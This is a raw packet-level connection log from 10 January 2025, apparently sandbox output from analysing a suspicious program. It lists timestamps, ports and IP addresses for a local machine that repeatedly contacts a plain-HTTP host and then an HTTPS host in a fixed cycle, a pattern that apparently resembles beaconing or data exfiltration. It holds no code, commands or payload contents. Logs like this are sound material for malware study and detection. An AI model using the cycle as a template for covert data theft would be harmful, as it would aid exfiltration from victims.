Jan 10, 2025 22:31:32.525335073 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.525346041 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.525466919 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.525473118 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.525516033 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.525686979 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.525731087 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.525736094 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.525795937 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.526038885 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.526074886 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.526267052 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.526308060 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.531858921 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.531907082 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.532005072 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.532048941 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.532053947 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.532083035 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.537729025 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.537784100 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.537872076 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.538094044 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.543474913 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.543524027 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.543529987 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.543566942 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.549263000 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.549313068 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.549319029 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.549356937 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.554518938 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.554568052 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.554583073 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.554621935 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.559834003 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.559883118 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.559909105 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.559956074 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.565171003 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.565227032 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.565232992 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.565300941 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.570494890 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.570547104 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.570554972 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.570591927 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.575659990 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.575711012 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.575772047 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.575812101 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.581079960 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.581131935 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.581140041 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.581197977 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.585292101 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.585344076 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.585350037 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.585381031 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.589690924 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.589731932 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.589771032 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.589808941 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594216108 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594260931 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594266891 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594306946 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594312906 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594342947 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594348907 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594383001 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594388962 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594414949 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594425917 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.594429970 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594464064 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.594480991 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:33.635260105 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:33.640086889 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:33.640162945 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:33.640458107 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:33.645212889 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:34.311220884 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:34.316279888 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:34.321089983 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:34.525429964 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:34.578496933 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:35.094578981 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.094609976 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.094674110 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.096877098 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.096887112 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.582050085 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.582138062 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.585042953 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.585048914 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.585293055 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.589139938 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.631321907 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.721245050 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.721307039 CET	443	49980	104.21.80.1	192.168.2.3
Jan 10, 2025 22:31:35.722470045 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:35.726468086 CET	49980	443	192.168.2.3	104.21.80.1
Jan 10, 2025 22:31:41.614938974 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:41.619803905 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:41.824558973 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:41.843534946 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:41.843561888 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:41.843621969 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:41.844337940 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:41.844348907 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:41.875333071 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.454742908 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.454859018 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.456796885 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.456804991 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.457041979 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.458484888 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.499353886 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.502573013 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.502595901 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.795159101 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.795245886 CET	443	49981	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:42.795331955 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.795835972 CET	49981	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:42.987256050 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.988238096 CET	49982	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.992357969 CET	80	49979	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:42.993057013 CET	80	49982	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:42.994534016 CET	49979	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.994570017 CET	49982	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.994663954 CET	49982	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:42.999428988 CET	80	49982	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:43.683789968 CET	80	49982	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:43.684896946 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:43.684932947 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:43.685003996 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:43.685548067 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:43.685556889 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:43.734718084 CET	49982	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:44.294982910 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:44.296717882 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:44.296739101 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:44.296794891 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:44.296802998 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:44.660547018 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:44.660644054 CET	443	49983	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:44.660702944 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:44.661226034 CET	49983	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:44.667265892 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:44.673310041 CET	80	49984	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:44.673403978 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:44.673602104 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:44.680319071 CET	80	49984	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:45.355113029 CET	80	49984	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:45.356878042 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:45.356931925 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:45.357093096 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:45.357461929 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:45.357477903 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:45.406589985 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.021735907 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:46.023464918 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:46.023488998 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:46.023538113 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:46.023550987 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:46.373914003 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:46.374027014 CET	443	49986	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:46.374151945 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:46.374625921 CET	49986	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:46.378300905 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.379491091 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.383379936 CET	80	49984	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:46.383454084 CET	49984	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.384299040 CET	80	49987	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:46.384380102 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.384521961 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:46.389419079 CET	80	49987	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:47.079864025 CET	80	49987	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:47.083745003 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:47.083789110 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:47.083887100 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:47.084188938 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:47.084201097 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:47.125334978 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:47.709734917 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:47.724910975 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:47.724924088 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:47.725075006 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:47.725091934 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:48.072851896 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:48.072937012 CET	443	49988	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:48.073072910 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:48.082174063 CET	49988	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:48.086365938 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:48.087652922 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:48.091376066 CET	80	49987	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:48.091444969 CET	49987	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:48.092411995 CET	80	49989	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:48.092483044 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:48.092689991 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:48.097498894 CET	80	49989	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:48.800211906 CET	80	49989	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:48.801738024 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:48.801780939 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:48.801938057 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:48.802252054 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:48.802261114 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:48.844105959 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.420191050 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:49.421844959 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:49.421854019 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:49.421899080 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:49.421907902 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:49.912075996 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:49.912162066 CET	443	49990	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:49.912770033 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:49.912770033 CET	49990	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:49.916063070 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.916639090 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.921061039 CET	80	49989	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:49.921389103 CET	80	49991	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:49.921442032 CET	49989	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.921477079 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.921541929 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:49.926500082 CET	80	49991	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:50.607156038 CET	80	49991	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:50.608378887 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:50.608407021 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:50.608520031 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:50.609042883 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:50.609061003 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:50.656615019 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.224751949 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:51.226712942 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:51.226732016 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:51.226782084 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:51.226790905 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:51.599100113 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:51.599193096 CET	443	49992	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:51.603034019 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:51.603034019 CET	49992	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:51.606525898 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.610512018 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.612027884 CET	80	49991	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:51.615361929 CET	80	49993	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:51.615405083 CET	49991	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.616767883 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.616767883 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:51.621581078 CET	80	49993	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:52.294369936 CET	80	49993	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:52.296241999 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:52.296278000 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:52.296749115 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:52.296749115 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:52.296778917 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:52.344491005 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:52.987848043 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:52.992109060 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:52.992120981 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:52.992160082 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:52.992167950 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:53.232486010 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:53.232592106 CET	443	49994	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:53.232631922 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:53.233377934 CET	49994	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:53.241950989 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:53.245817900 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:53.247072935 CET	80	49993	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:53.247126102 CET	49993	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:53.250641108 CET	80	49995	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:53.250701904 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:53.250804901 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:53.255579948 CET	80	49995	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:53.936929941 CET	80	49995	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:53.938117027 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:53.938174963 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:53.938325882 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:53.938652039 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:53.938669920 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:53.984728098 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.574125051 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:54.576337099 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:54.576360941 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:54.576483965 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:54.576488972 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:54.979593992 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:54.979698896 CET	443	49996	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:54.979757071 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:54.980268955 CET	49996	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:54.983834982 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.986915112 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.988837957 CET	80	49995	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:54.988893986 CET	49995	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.991765022 CET	80	49997	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:54.991856098 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.991949081 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:54.996742964 CET	80	49997	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:55.731010914 CET	80	49997	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:55.732574940 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:55.732630014 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:55.732707977 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:55.733134985 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:55.733151913 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:55.781599045 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.342117071 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:56.343924046 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:56.343955994 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:56.344041109 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:56.344048977 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:56.646966934 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:56.647052050 CET	443	49998	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:56.647222996 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:56.647696972 CET	49998	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:56.651776075 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.653428078 CET	49999	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.656738043 CET	80	49997	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:56.656790972 CET	49997	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.658420086 CET	80	49999	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:56.658498049 CET	49999	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.658602953 CET	49999	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:56.663372993 CET	80	49999	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:57.339839935 CET	80	49999	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:57.343774080 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:57.343837023 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:57.343921900 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:57.344270945 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:57.344288111 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:57.391050100 CET	49999	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:57.971425056 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:58.016112089 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:58.069669008 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:58.069695950 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:58.069776058 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:58.069785118 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:58.501029015 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:58.501121998 CET	443	50000	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:58.501174927 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:58.501730919 CET	50000	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:58.505109072 CET	49999	80	192.168.2.3	132.226.247.73
